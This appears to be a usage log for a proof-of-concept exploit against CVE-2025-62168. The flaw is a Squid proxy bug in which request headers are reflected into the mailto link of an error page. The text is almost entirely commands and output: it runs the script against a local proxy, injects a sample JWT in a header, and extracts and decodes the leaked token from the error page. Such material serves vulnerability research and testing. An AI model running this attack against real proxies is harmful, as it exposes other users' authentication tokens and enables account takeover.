# active venv cd ~/CVE-2025-62168 source .venv/bin/activate # usage python cve-2025-py usage: cve-2025-62168.py [-h] [--proxy PROXY] [--verbose] PoC for CVE-2025-62168 — Squid Proxy token leak via error page header reflection. options: -h, --help show this help message and exit --proxy PROXY Proxy URL (e.g. http://127.0.0.1:3128) --verbose Enable technical debug output Example: python3 cve-2025-62168.py --proxy http://127.0.0.1:3128 --verbose [!] Missing required argument: --proxy # exec python3 cve-2025-62168.py --proxy http://ip.server:port python3 cve-2025-62168.py --proxy http://127.0.0.1:3128 ------------------------------------------------------------ STEP 1 — Connecting to proxy... ------------------------------------------------------------ Proxy: http://127.0.0.1:3128 ------------------------------------------------------------ STEP 2 — Sending request with injected token... ------------------------------------------------------------ Injected Header: X-Test-Leak: eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.ewo... ------------------------------------------------------------ STEP 3 — Server responded, extracting error page... ------------------------------------------------------------ ------------------------------------------------------------ STEP 4 — Parsing mailto block from Squid error page... ------------------------------------------------------------ mailto:webmaster?subject=CacheErrorInfo%20-%20ERR_READ_ERROR&body=CacheHost%3A%20poc-linux%0D%0AErrPage%3A%20ERR_READ_ERROR%0D%0AErr%3A%20%5Bnone%5D%0D%0ATimeStamp%3A%20Tue,%2025%20Nov%202025%2014%3A32%3A29%20GMT%0D%0A%0D%0AClientIP%3A%20127.0.0.1%0D%0A%0D%0AHTTP%20Request%3A%0D%0AGET%20%2F%20HTTP%2F1.1%0AUser-Agent%3A%20krakhen.dev-cve-2025-62168-poc%0D%0AX-Test-Leak%3A%20eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.ewogICJzdWIiOiAiMTIzNDU2Nzg5MCIsCiAgIm5hbWUiOiAia3Jha2hlbi5kZXYiLAogICJhZG1pbiI6IHRydWUsCiAgImlhdCI6IDE1MTYyMzkwMjIKfQo.LspWRdaIXcXllUuABCsYXRqBoKseG5vlb_YIW259aiU%0D%0AAccept%3A%20*%2F*%0D%0AAccept-Encoding%3A%20gzip,%20deflate%0D%0AHost%3A%20nonexistent.krakhen-test.local%0D%0A%0D%0A%0D%0A ------------------------------------------------------------ STEP 5 — TOKEN LEAK CONFIRMED ------------------------------------------------------------ eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.ewogICJzdWIiOiAiMTIzNDU2Nzg5MCIsCiAgIm5hbWUiOiAia3Jha2hlbi5kZXYiLAogICJhZG1pbiI6IHRydWUsCiAgImlhdCI6IDE1MTYyMzkwMjIKfQo.LspWRdaIXcXllUuABCsYXRqBoKseG5vlb_YIW259aiU ------------------------------------------------------------ STEP 6 — Decoding JWT token... ------------------------------------------------------------ Header: { "alg": "HS256", "typ": "JWT" } Payload: { "sub": "1234567890", "name": "krakhen.dev", "admin": true, "iat": 1516239022 } Signature: LspWRdaIXcXllUuABCsYXRqBoKseG5vlb_YIW259aiU ------------------------------------------------------------ DONE — PoC completed successfully. ------------------------------------------------------------